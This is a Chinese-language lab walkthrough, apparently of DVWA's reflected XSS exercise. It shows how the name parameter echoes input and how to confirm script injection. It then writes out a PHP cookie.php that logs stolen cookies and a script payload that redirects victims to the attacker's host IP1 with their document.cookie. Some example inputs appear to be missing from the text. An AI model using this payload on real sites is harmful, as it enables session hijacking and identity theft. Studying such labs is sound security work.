点击该板块
看到题目,输入名称xss得到回显Hello xss
若输入则回显只剩下Hello

点击右键查看网页源代码,发现 变成了符号
说明此处可以注入标签
输入出现弹窗,成功注入了脚本,说明漏洞存在
再次查看源代码

角色定义:用户、攻击者、被攻击的Web服务器、攻击者的Web服务器
若攻击者Web服务器的IP地址为IP1,则http://IP1/cookie.php
cookie.php的内容如下所示
$cookie=$_GET[‘cookie‘]; //获得cookie并存储
file_put_contents(‘cookie.txt’,$cookie); //将cookie写到文件中
?>
目的是为了获取用户的cookie从而伪装用户身份
<script>document.location='http://IP1/cookie.php?cookie='+document.cookie;</script>
对一个个URL地址来说

https:协议
www.baidu.com:域名
/s:路径
wd=hello&rsv_spt=1:查询参数
#5:锚点
本实验中我们观察URL可以看到
参数name即符合这样一种模式
因此对于URL的构造就要把我们构造的JS脚本拼接到查询参数处
即
http://IP2/dvwa/vulenrabilities/xss_r/?name=
传入的参数其实是JS脚本,会被服务器执行